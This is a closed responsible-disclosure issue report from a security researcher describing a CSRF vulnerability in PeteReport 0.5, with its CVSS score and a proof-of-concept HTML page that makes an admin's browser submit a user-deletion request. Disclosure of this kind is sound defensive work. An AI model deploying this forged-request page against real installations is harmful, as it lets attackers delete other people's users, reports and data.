Closed
Description
Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside PeteReport version 0.5.
Attached below are the links to our responsible disclosure policy.
Bug description
PeteReport Version 0.5 contains a Cross Site Request Forgery (CSRF) vulnerability allowing an attacker to trick users into deleting users, products, reports and findings in the application.
CVSSv3 Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
CVSSv3 Base Score:
4.3
Steps to reproduce
- Create a malicious html file with the following content.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<!--Change ID -->
<form action="https://127.0.0.1/configuration/user/delete/:id">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
- If an authenticated admin visits the malicious url, the user with the correspond id will be deleted
Screenshots and files
System Information
- Version: PeteReport Version 0.5.
- Operating System: Docker.
- Web Server: nginx.

